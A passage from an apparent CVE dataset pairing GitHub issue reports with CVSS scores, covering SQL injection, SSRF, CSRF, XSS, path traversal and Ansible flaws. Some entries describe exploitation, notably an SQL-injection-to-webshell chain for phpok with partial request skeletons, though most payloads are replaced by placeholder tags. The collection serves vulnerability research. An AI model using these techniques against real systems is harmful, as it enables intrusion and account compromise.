  48875. "description": "Pre auth SQL injection. tl;dr Flaws in the DAO/DTO implementation allow SQLi in the order by clause. User token and/or password hash are disclosed in pre auth APIs, which are vulnerable to the SQLi above as well. detail APITAG is exposed by a default install. For instance, the demo site. FILETAG The refresh token can be used to exchange for a valid jwt ticket, or, in a different way to compromise a user account, to log in with a credential cracked from the leaked md5 hash. Before actually stepping into the system, let's see what else we could find on this API. Request handling looks a lot like this CODETAG APITAG casts a few params to Int and replaces 'bad words' with a blank string in 'ascs' and 'desc' (which are then pasted into the order by clause) CODETAG the APITAG thing is a sort of indicator for the batis data model; apart from being a type indicator it is in charge of building the statement. After a few delegates and overrides it gets invoked in the way below CODETAG Only seen tokenization stuff in APITAG At this stage, pre auth visitors can perform SQLi by providing a malicious query.get FILETAG this gets you the current db user. APITAG post script the actual PATHTAG sets a fixed \"desc\", and is vulnerable to a malicious \"ascs\" only. APITAG",
  48876. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48877. "severity": "CRITICAL",
  48878. "baseScore": 9.8,
  48879. "impactScore": 5.9,
  48880. "exploitabilityScore": 3.9
  48881. },
  48882. {
  48883. "CVE_ID": "CVE-2020-16248",
  48884. "Issue_Url_old": "https://github.com/prometheus/blackbox_exporter/issues/669",
  48885. "Issue_Url_new": "https://github.com/prometheus/blackbox_exporter/issues/669",
  48886. "Repo_new": "prometheus/blackbox_exporter",
  48887. "Issue_Created_At": "2020-08-03T02:20:15Z",
  48888. "description": "Prometheus Blackbox Exporter through NUMBERTAG allows /probe?target= SSRF. SSRF Vulnerability During the company's penetration test, it was found that the Blackbox > Exporter service was exposed to the Internet, which enabled SSRF-based > probing of the company's internal network > > Set up the Blackbox Exporter test environment, and then visit: > > URLTAG > > > Blackbox Exporter logs service jump will be displayed > URLTAG > > As long as the target is replaced, the service of detecting internal > service weakness can be realized > > Also supports other protocols > Blackbox Exporter is a service to test the state of network > connectivity. If it is configured incorrectly, SSRF can detect weak > services and applications in the internal network. CVETAG",
  48889. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
  48890. "severity": "MEDIUM",
  48891. "baseScore": 5.8,
  48892. "impactScore": 1.4,
  48893. "exploitabilityScore": 3.9
  48894. },
  48895. {
  48896. "CVE_ID": "CVE-2020-16252",
  48897. "Issue_Url_old": "https://github.com/ankane/field_test/issues/28",
  48898. "Issue_Url_new": "https://github.com/ankane/field_test/issues/28",
  48899. "Repo_new": "ankane/field_test",
  48900. "Issue_Created_At": "2020-08-04T20:05:09Z",
  48901. "description": "CSRF Vulnerability with Non Session Based Authentication. The Field Test dashboard is vulnerable to cross site request forgery (CSRF) with non session based authentication methods. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG to NUMBERTAG Fixed Versions NUMBERTAG Impact The Field Test dashboard is vulnerable to CSRF with non session based authentication methods, like basic authentication. Session based authentication methods (like Devise's default authentication) are not affected. A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, a single endpoint is affected, which allows for changing the variant assigned to a user. All users running an affected release should upgrade immediately. Technical Details Field Test uses the APITAG method from Rails to prevent CSRF. However, this defaults to APITAG , which has no effect on non session based authentication methods. This has been changed to ERRORTAG .",
  48902. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  48903. "severity": "MEDIUM",
  48904. "baseScore": 4.3,
  48905. "impactScore": 1.4,
  48906. "exploitabilityScore": 2.8
  48907. },
  48908. {
  48909. "CVE_ID": "CVE-2020-16253",
  48910. "Issue_Url_old": "https://github.com/ankane/pghero/issues/330",
  48911. "Issue_Url_new": "https://github.com/ankane/pghero/issues/330",
  48912. "Repo_new": "ankane/pghero",
  48913. "Issue_Created_At": "2020-08-04T19:31:45Z",
  48914. "description": "CSRF Vulnerability. APITAG is vulnerable to cross site request forgery (CSRF). This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact The APITAG dashboard is vulnerable to cross site request forgery (CSRF). This affects the Docker image, Linux packages, and in specific cases, the Rails gem. The Rails gem is vulnerable with non session based authentication methods like basic authentication; session based authentication methods (like Devise's default authentication) are not affected. A CSRF attack works by getting an authorized user to visit a malicious website and then performing requests on behalf of the user. In this instance, actions include NUMBERTAG Canceling running queries NUMBERTAG Running EXPLAIN on queries (without seeing the results, but can be used for denial of service and other attacks) NUMBERTAG Resetting query stats (running APITAG ) All users running an affected release should upgrade immediately. Credits Thanks to Heiko Webers of FILETAG for reporting this. Technical Details APITAG uses the APITAG method from Rails to prevent CSRF. However, this defaults to APITAG , which has no effect on non session based authentication methods. This has been changed to ERRORTAG .",
  48915. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  48916. "severity": "HIGH",
  48917. "baseScore": 8.1,
  48918. "impactScore": 5.2,
  48919. "exploitabilityScore": 2.8
  48920. },
  48921. {
  48922. "CVE_ID": "CVE-2020-16254",
  48923. "Issue_Url_old": "https://github.com/ankane/chartkick/issues/546",
  48924. "Issue_Url_new": "https://github.com/ankane/chartkick/issues/546",
  48925. "Repo_new": "ankane/chartkick",
  48926. "Issue_Created_At": "2020-08-04T20:29:47Z",
  48927. "description": "CSS injection with width and height options. The Chartkick Ruby gem is vulnerable to CSS injection if user input is passed to the width or height option. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG and below Fixed Versions NUMBERTAG Impact Chartkick is vulnerable to CSS injection if user input is passed to the width or height option. APITAG An attacker can set additional CSS properties, like: APITAG All users running an affected release should upgrade. Technical Details Chartkick used APITAG to escape the width and height. This prevents XSS, but does not escape semicolons, which allows CSS additional properties to be set. Chartkick now limits width and height values to alphanumeric and % (this prevents some valid values like APITAG but keeps things simple).",
  48928. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  48929. "severity": "MEDIUM",
  48930. "baseScore": 6.1,
  48931. "impactScore": 2.7,
  48932. "exploitabilityScore": 2.8
  48933. },
  48934. {
  48935. "CVE_ID": "CVE-2020-16269",
  48936. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/17383",
  48937. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/17383",
  48938. "Repo_new": "radareorg/radare2",
  48939. "Issue_Created_At": "2020-07-31T00:14:52Z",
  48940. "description": "FILETAG",
  48941. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  48942. "severity": "MEDIUM",
  48943. "baseScore": 5.5,
  48944. "impactScore": 3.6,
  48945. "exploitabilityScore": 1.8
  48946. },
  48947. {
  48948. "CVE_ID": "CVE-2020-16610",
  48949. "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/53",
  48950. "Issue_Url_new": "https://github.com/havok89/hoosk/issues/53",
  48951. "Repo_new": "havok89/hoosk",
  48952. "Issue_Created_At": "2020-04-12T01:21:37Z",
  48953. "description": "CSRF issue that allows attacker to delete an account. Hi, I also found a CSRF issue in the admin page. When an attacker lures an authenticated admin user to a malicious web page, any account can be deleted without the admin user's intention. how to reproduce the issue NUMBERTAG Login to admin APITAG NUMBERTAG Stay logged in and open an HTML page with the following content CODETAG userid is very easy to guess. APITAG the account with userid = userid is deleted without the admin user's intention. how to fix this issue: require a CSRF token to protect the delete function.",
  48954. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N",
  48955. "severity": "MEDIUM",
  48956. "baseScore": 4.3,
  48957. "impactScore": 1.4,
  48958. "exploitabilityScore": 2.8
  48959. },
  48960. {
  48961. "CVE_ID": "CVE-2020-16629",
  48962. "Issue_Url_old": "https://github.com/Gh0stF/phpok_cve/issues/1",
  48963. "Issue_Url_new": "https://github.com/gh0stf/phpok_cve/issues/1",
  48964. "Repo_new": "gh0stf/phpok_cve",
  48965. "Issue_Created_At": "2020-02-06T05:33:40Z",
  48966. "description": "phpokcms Sqli To Getshell. Problem location: Here is the injection point framework / API / APITAG The main operation is to save the file upload information to the database. $upload = $this >lib('upload') >upload('upfile'); if (!$upload || !$upload FILETAG FILETAG You can see this Sql information: INSERT INTO qinggan_res ( APITAG , folder , name , ext , filename , addtime , title , APITAG , attr , APITAG , APITAG ) VALUES( PATHTAG ) Then the injection point has appeared, using method: APITAG can call the controller and its methods through FILETAG , and there is an attachment replacement method at PATHTAG which queries the old file name from the database, then deletes the corresponding file from the disk, and adds the newly uploaded file. We can see the key method of attachment replacement It is located in framework / LIBS / APITAG NUMBERTAG as follows: public function mv($old,$new,$recover=true) { if(!file_exists($old)){ return false; } if(substr($new NUMBERTAG this >make($new,\"dir\"); }else{ $this >make($new,\"file\"); } if(file_exists($new)){ if($recover){ unlink($new); }else{ return false; } }else{ $new = APITAG } rename($old,$new); return true; } As you can see, although it's an attachment replacement, it doesn't matter if the source attachment doesn't exist. It's still written normally. So the idea from injection to getshell is: inject an attachment record through SQL whose file type is PHP, and then call the attachment replacement function through FILETAG ; you can write a PHP file to the target path.\nThe payload is as follows POST APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Origin: FILETAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG APITAG DNT NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: / Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh; APITAG US; APITAG Connection: close APITAG Content Disposition: form data; name=\"id\" WU_FILE NUMBERTAG APITAG Content Disposition: form data; name=\"name\" FILETAG APITAG Content Disposition: form data; name=\"type\" FILETAG FILETAG However, in the upload part, there is a two-byte file header check FILETAG So we need to add the two-byte picture header, URL encoded as NUMBERTAG p So the payload looks like this POST APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Origin: FILETAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG APITAG DNT NUMBERTAG Content Type: multipart/form data; boundary= APITAG Accept: / Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh; APITAG US; APITAG Connection: close APITAG Content Disposition: form data; name=\"id\" WU_FILE NUMBERTAG APITAG Content Disposition: form data; name=\"name\" FILETAG APITAG Content Disposition: form data; name=\"type\" image/png APITAG Content Disposition: form data; APITAG Wed Sep NUMBERTAG GMT NUMBERTAG APITAG Standard Time) APITAG Content Disposition: form data; name=\"size NUMBERTAG APITAG Content Disposition: form data; name=\"upfile\"; APITAG Content Type: image/png \u0089P APITAG APITAG FILETAG Boom! We can see the APITAG is really successfully output on the page! FILETAG",
  48967. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  48968. "severity": "CRITICAL",
  48969. "baseScore": 9.8,
  48970. "impactScore": 5.9,
  48971. "exploitabilityScore": 3.9
  48972. },
  48973. {
  48974. "CVE_ID": "CVE-2020-16632",
  48975. "Issue_Url_old": "https://github.com/ky-j/dedecms/issues/12",
  48976. "Issue_Url_new": "https://github.com/ky-j/dedecms/issues/12",
  48977. "Repo_new": "ky-j/dedecms",
  48978. "Issue_Created_At": "2020-04-29T17:32:07Z",
  48979. "description": "XSS and CSRF Vulnerability exists in the file of APITAG NUMBERTAG SP2 version. When a common user sends this malicious URL to the web manager and the manager requests it, the malicious javascript code is executed in the web manager's browser FILETAG",
  48980. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  48981. "severity": "MEDIUM",
  48982. "baseScore": 5.4,
  48983. "impactScore": 2.7,
  48984. "exploitabilityScore": 2.3
  48985. },
  48986. {
  48987. "CVE_ID": "CVE-2020-16843",
  48988. "Issue_Url_old": "https://github.com/firecracker-microvm/firecracker/issues/2057",
  48989. "Issue_Url_new": "https://github.com/firecracker-microvm/firecracker/issues/2057",
  48990. "Repo_new": "firecracker-microvm/firecracker",
  48991. "Issue_Created_At": "2020-08-03T09:01:39Z",
  48992. "description": "Firecracker NUMBERTAG and NUMBERTAG network stack can freeze under heavy ingress traffic. We have identified an issue in the Firecracker NUMBERTAG and NUMBERTAG irtio net emulation. Issue Description Under heavy network ingress traffic, when the host TAP interface's receive queue is not drained and the guest virtio net device's receive queue is full, the APITAG network interface ingress can freeze. There is no possibility to recover from this state, resulting in a denial of service on the APITAG when it is configured with a single network interface, and causing an availability problem for the APITAG network interface on which the issue is triggered. This issue is difficult to reproduce with TCP traffic. The TCP congestion algorithm makes it harder to fill both the TAP interface and virtio receive queues. Impact When this issue is triggered, the guest kernel network interface will no longer receive packets. Vulnerable Systems Firecracker releases NUMBERTAG and NUMBERTAG are affected.",
  48993. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  48994. "severity": "MEDIUM",
  48995. "baseScore": 5.9,
  48996. "impactScore": 3.6,
  48997. "exploitabilityScore": 2.2
  48998. },
  48999. {
  49000. "CVE_ID": "CVE-2020-1733",
  49001. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67791",
  49002. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67791",
  49003. "Repo_new": "ansible/ansible",
  49004. "Issue_Created_At": "2020-02-26T19:46:31Z",
  49005. "description": "Insecure creation of temporary directory for become_user. SUMMARY CVETAG We create a temporary directory for the APITAG with APITAG in APITAG without first checking if the directory exists and that it has the expected permissions. Relevant code URLTAG We need to validate the parent directories are as expected before creating directories in those paths and fail if the permissions and/or ACLs are not what we expect. ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49006. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L",
  49007. "severity": "MEDIUM",
  49008. "baseScore": 5.0,
  49009. "impactScore": 3.7,
  49010. "exploitabilityScore": 0.8
  49011. },
  49012. {
  49013. "CVE_ID": "CVE-2020-1734",
  49014. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67792",
  49015. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67792",
  49016. "Repo_new": "ansible/ansible",
  49017. "Issue_Created_At": "2020-02-26T19:48:32Z",
  49018. "description": "pipe lookup plugin enables shell by default. SUMMARY CVETAG The pipe lookup plugin should use APITAG by default to avoid potential privilege escalation. A new option should provide a way to enable APITAG . If a variable is passed to the pipe lookup, that variable could be overridden via facts, leading to arbitrary code execution. Relevant code: URLTAG It seems like this change was made intentionally quite a while ago ( URLTAG Changing the default will probably break a lot of things for people. \ud83d\ude1e ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49019. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L",
  49020. "severity": "HIGH",
  49021. "baseScore": 7.4,
  49022. "impactScore": 6.0,
  49023. "exploitabilityScore": 0.8
  49024. },
  49025. {
  49026. "CVE_ID": "CVE-2020-1735",
  49027. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67793",
  49028. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67793",
  49029. "Repo_new": "ansible/ansible",
  49030. "Issue_Created_At": "2020-02-26T19:50:23Z",
  49031. "description": "Fetch module path traversal. SUMMARY CVETAG Possibly related to CVETAG ( URLTAG The fetch module takes the source result from the slurp module, which came from the remote host. We don't really validate this path and it could have been manipulated by the remote host in a malicious way such that we end up with a path similar to APITAG for the source. This allows an attacker to place a file the contents of which they control. Relevant Code: URLTAG Suggested correction from the reporter: Don't use APITAG to compute the destination file, or sanitize the last argument and add the following check: CODETAG ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49032. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
  49033. "severity": "MEDIUM",
  49034. "baseScore": 4.6,
  49035. "impactScore": 2.7,
  49036. "exploitabilityScore": 1.5
  49037. },
  49038. {
  49039. "CVE_ID": "CVE-2020-1736",
  49040. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67794",
  49041. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67794",
  49042. "Repo_new": "ansible/ansible",
  49043. "Issue_Created_At": "2020-02-26T19:54:05Z",
  49044. "description": "The default permissions used by atomic_move create files that are world readable. SUMMARY CVETAG If a file doesn't exist, we create it with APITAG permissions combined with the current umask. Depending on the default umask as well as the permissions on the destination directory, this could result in world readable files. Relevant code: Default permissions: URLTAG creation in APITAG : URLTAG ERRORTAG Suggested correction is to use more restrictive permissions by default and/or add a mechanism to prevent creating world readable files. ISSUE TYPE Bug Report COMPONENT NAME ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49045. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  49046. "severity": "LOW",
  49047. "baseScore": 3.3,
  49048. "impactScore": 1.4,
  49049. "exploitabilityScore": 1.8
  49050. },
  49051. {
  49052. "CVE_ID": "CVE-2020-17366",
  49053. "Issue_Url_old": "https://github.com/NLnetLabs/routinator/issues/319",
  49054. "Issue_Url_new": "https://github.com/nlnetlabs/routinator/issues/319",
  49055. "Repo_new": "nlnetlabs/routinator",
  49056. "Issue_Created_At": "2020-04-28T14:53:53Z",
  49057. "description": "Missing files don't result in a Manifest/PP being considered invalid. In a MITM scenario where an attacker intercepts and manipulates the rsync channel (for example strategically withholding certain APITAG files from the view of the validator being attacked), the resulting set of VRPs will be incomplete and can cause severe operational issues. When a manifest is valid (manifest is parsable, CRL exists and is valid (also not expired), and manifest is signed with keys not revoked by the CRL), and references files which do not exist in the repository at hand, the publication point should be considered compromised. So in the case of APNIC where an End User (self hosted) RPKI publication point misses a few .roa files, the validator can proceed to consider all data from all RPs it could reach eligible for further validation, except any data from the publication point where files were missing. In other words: if one or a few files are missing from the repository, the repository should be considered 'down', and no attempt should be made to start guessing what can be salvaged and what not. To offer an example: In manifest APITAG , a number of ROAs and a CRL are referenced: CODETAG If an attacker withholds all but APITAG , so the MITM does the equivalent of: CODETAG and the validator does not consider APITAG in its entirety invalid due to one or more missing APITAG or APITAG files, in this specific example the remaining ROA will render all BGP announcements equal to or covered under APITAG invalid. This results in actual downtime in real networks. If the manifest (which references a missing APITAG file) is ignored in its entirety or considered invalid, the remaining APITAG ROA which would've been transformed into VRP APITAG is also ignored. This renders all BGP announcements under that NUMBERTAG APITAG rather than invalid, which is a preferable situation.\nAPITAG now has a patch where if a file is referenced by the manifest, but is missing (either due to CA operational error or because of a MITM attack; we can't differentiate the two), that specific manifest is considered invalid. It will depend on the structure of the CA certificate trees whether this measure is sufficient or whether a single missing file has to result in the entire publication point being considered invalid. But until we have more information about other attack vectors, I recommend that a manifest as a whole is considered invalid when it references a non existing or wrongly checksummed file. The onus is on the CA publication points to publish correct valid RPKI data; validators can't be expected to compensate for CA operator errors (or MITM attacks). An additional check is needed: if one of the .roa files a manifest references is corrupt (the MITM didn't strategically _delete_ a file, but filled some .roa files with garbage): ERRORTAG corrupting that one .roa file results in an incomplete (operationally problematic) set of VRPs: CODETAG In the above example there should be NUMBERTAG RPs in total, APITAG contained NUMBERTAG RPs. In summary: If a manifest references a non existing file, or if there is a checksum mismatch between the hash described in the manifest and the hash as derived from the .roa file, the RP MUST consider the whole manifest invalid and not produce VRPs with the remaining .roa files.",
  49058. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
  49059. "severity": "HIGH",
  49060. "baseScore": 7.4,
  49061. "impactScore": 5.2,
  49062. "exploitabilityScore": 2.2
  49063. },
  49064. {
  49065. "CVE_ID": "CVE-2020-1737",
  49066. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67795",
  49067. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67795",
  49068. "Repo_new": "ansible/ansible",
  49069. "Issue_Created_At": "2020-02-26T19:55:42Z",
  49070. "description": "win_unzip path traversal with specially crafted archive. SUMMARY CVETAG A specially crafted zip archive could result in path traversal in the ERRORTAG module. The APITAG function doesn't check if the extracted path belongs to the destination folder. A possible solution is to FILETAG . ISSUE TYPE Bug Report COMPONENT NAME ERRORTAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49071. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  49072. "severity": "HIGH",
  49073. "baseScore": 7.8,
  49074. "impactScore": 5.9,
  49075. "exploitabilityScore": 1.8
  49076. },
  49077. {
  49078. "CVE_ID": "CVE-2020-1738",
  49079. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67796",
  49080. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67796",
  49081. "Repo_new": "ansible/ansible",
  49082. "Issue_Created_At": "2020-02-26T19:57:02Z",
  49083. "description": "package and service modules allow arbitrary modules to be executed . SUMMARY CVETAG Both package and service modules use facts to determine the name of the module to run if use is not passed to the module. The APITAG and APITAG facts could be set to another module name or a module name installed in a collection such as APITAG , which would allow arbitrary code execution on the managed node. A potential fix would be to whitelist valid modules for package and service and/or have the collection loader validate the collection path to not allow arbitrary files. The collection loader part may already be fixed in NUMBERTAG ISSUE TYPE Bug Report COMPONENT NAME APITAG APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49084. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:L/A:L",
  49085. "severity": "LOW",
  49086. "baseScore": 3.9,
  49087. "impactScore": 2.7,
  49088. "exploitabilityScore": 0.8
  49089. },
  49090. {
  49091. "CVE_ID": "CVE-2020-1739",
  49092. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67797",
  49093. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67797",
  49094. "Repo_new": "ansible/ansible",
  49095. "Issue_Created_At": "2020-02-26T19:58:52Z",
  49096. "description": "Command used in subversion module is problematic. SUMMARY CVETAG The password is used in the svn command that is run by the subversion module. The password should be passed in via some other mechanism other than as a parameter to avoid the password being read at APITAG on the managed node. Problematic code: URLTAG ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml subversion: repo: PATHTAG dest: /src/checkout checkout: no update: no password: \"{{ vault_svn_pass }}\" EXPECTED RESULTS Password is not visible. ACTUAL RESULTS Password can be observed at APITAG on the managed node.",
  49097. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N",
  49098. "severity": "LOW",
  49099. "baseScore": 3.9,
  49100. "impactScore": 2.5,
  49101. "exploitabilityScore": 1.3
  49102. },
  49103. {
  49104. "CVE_ID": "CVE-2020-1740",
  49105. "Issue_Url_old": "https://github.com/ansible/ansible/issues/67798",
  49106. "Issue_Url_new": "https://github.com/ansible/ansible/issues/67798",
  49107. "Repo_new": "ansible/ansible",
  49108. "Issue_Created_At": "2020-02-26T20:00:23Z",
  49109. "description": "ansible vault edit race condition. SUMMARY CVETAG A race condition exists in APITAG which could allow another user on the same computer can read the old and new secret. When executing APITAG , the method APITAG creates the temporary file with APITAG . However, the returned file descriptor is closed and APITAG is called to write to the file. APITAG will delete the file and recreate it. A malicious user can create the file with permissions allowing them access to the file after the unlink. The proposed solution is to write directly to the file descriptor in APITAG rather than deleting and creating a new file. Relevant code: URLTAG ISSUE TYPE Bug Report COMPONENT NAME APITAG ANSIBLE VERSION APITAG CONFIGURATION paste below default OS / ENVIRONMENT STEPS TO REPRODUCE yaml EXPECTED RESULTS ACTUAL RESULTS paste below",
  49110. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
  49111. "severity": "MEDIUM",
  49112. "baseScore": 4.7,
  49113. "impactScore": 3.6,
  49114. "exploitabilityScore": 1.0
  49115. },
  49116. {
  49117. "CVE_ID": "CVE-2020-17479",
  49118. "Issue_Url_old": "https://github.com/manvel-khnkoyan/jpv/issues/10",
  49119. "Issue_Url_new": "https://github.com/manvel-khnkoyan/jpv/issues/10",
  49120. "Repo_new": "manvel-khnkoyan/jpv",
  49121. "Issue_Created_At": "2020-08-06T20:07:51Z",
  49122. "description": "Validation Bypass. Hello, I'm a security researcher at Sonatype, and I discovered a potential vulnerability in this project. Do you have a preferred way for me to share the details privately, or do you want me to just show you what I've got on this APITAG issue?",
  49123. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  49124. "severity": "CRITICAL",
  49125. "baseScore": 9.8,
  49126. "impactScore": 5.9,
  49127. "exploitabilityScore": 3.9
  49128. },
  49129. {
  49130. "CVE_ID": "CVE-2020-17487",
  49131. "Issue_Url_old": "https://github.com/radareorg/radare2/issues/17431",
  49132. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/17431",
  49133. "Repo_new": "radareorg/radare2",
  49134. "Issue_Created_At": "2020-08-09T11:24:28Z",
  49135. "description": "FILETAG",
  49136. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  49137. "severity": "HIGH",
  49138. "baseScore": 7.5,
  49139. "impactScore": 3.6,
  49140. "exploitabilityScore": 3.9
  49141. },
  49142. {
  49143. "CVE_ID": "CVE-2020-17495",
  49144. "Issue_Url_old": "https://github.com/celery/django-celery-results/issues/142",
  49145. "Issue_Url_new": "https://github.com/celery/django-celery-results/issues/142",
  49146. "Repo_new": "celery/django-celery-results",
  49147. "Issue_Created_At": "2020-04-13T19:27:43Z",
  49148. "description": "Question: Disable storing of task arguments. Hi, apologies if this is documented somewhere (I can't find it), but is there a quick way not to store the arguments that were passed to the celery task? Some of my tasks contain potentially sensitive information, and I would prefer not to have a permanent record of them inside of my database (I'm also looking at encrypting this information, but would prefer not to store it regardless).",
  49149. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  49150. "severity": "HIGH",
  49151. "baseScore": 7.5,
  49152. "impactScore": 3.6,
  49153. "exploitabilityScore": 3.9
  49154. },
  49155. {
  49156. "CVE_ID": "CVE-2020-17541",
  49157. "Issue_Url_old": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/392",
  49158. "Issue_Url_new": "https://github.com/libjpeg-turbo/libjpeg-turbo/issues/392",
  49159. "Repo_new": "libjpeg-turbo/libjpeg-turbo",
  49160. "Issue_Created_At": "2019-12-05T13:46:42Z",
  49161. "description": "report a stack buffer overflow security issue. There' s a stack buffer overflow in encode_one_block function, the backtrace of the crash point is below. The version is the latest from the git main branch: APITAG ERRORTAG poc URLTAG",
  49162. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  49163. "severity": "HIGH",
  49164. "baseScore": 8.8,
  49165. "impactScore": 5.9,
  49166. "exploitabilityScore": 2.8
  49167. },
  49168. {
  49169. "CVE_ID": "CVE-2020-17542",
  49170. "Issue_Url_old": "https://github.com/dotCMS/core/issues/16890",
  49171. "Issue_Url_new": "https://github.com/dotcms/core/issues/16890",
  49172. "Repo_new": "dotcms/core",
  49173. "Issue_Created_At": "2019-07-19T03:44:10Z",
  49174. "description": "APITAG NUMBERTAG stored xss vul.. hi, I've found a xss vul on APITAG NUMBERTAG it allows remote attackers to insert js code and print APITAG screenshots below. FILETAG FILETAG FILETAG",
  49175. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  49176. "severity": "MEDIUM",
  49177. "baseScore": 5.4,
  49178. "impactScore": 2.7,
  49179. "exploitabilityScore": 2.3
  49180. },
  49181. {
  49182. "CVE_ID": "CVE-2020-17551",
  49183. "Issue_Url_old": "https://github.com/ImpressCMS/impresscms/issues/659",
  49184. "Issue_Url_new": "https://github.com/impresscms/impresscms/issues/659",
  49185. "Repo_new": "impresscms/impresscms",
  49186. "Issue_Created_At": "2020-06-18T23:49:04Z",
  49187. "description": "Stored XSS on APITAG NUMBERTAG Payload = APITAG APITAG Vulnerable URL PATHTAG Vulnerable APITAG : ID of the [adsense tag to display this ad] Vulnerable URL PATHTAG Vulnerable APITAG : Name Reference URLTAG",
  49188. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  49189. "severity": "MEDIUM",
  49190. "baseScore": 4.8,
  49191. "impactScore": 2.7,
  49192. "exploitabilityScore": 1.7
  49193. },
  49194. {
  49195. "CVE_ID": "CVE-2020-18035",
  49196. "Issue_Url_old": "https://github.com/zchuanzhao/jeesns/issues/8",
  49197. "Issue_Url_new": "https://github.com/zchuanzhao/jeesns/issues/8",
  49198. "Repo_new": "zchuanzhao/jeesns",
  49199. "Issue_Created_At": "2018-12-24T07:48:19Z",
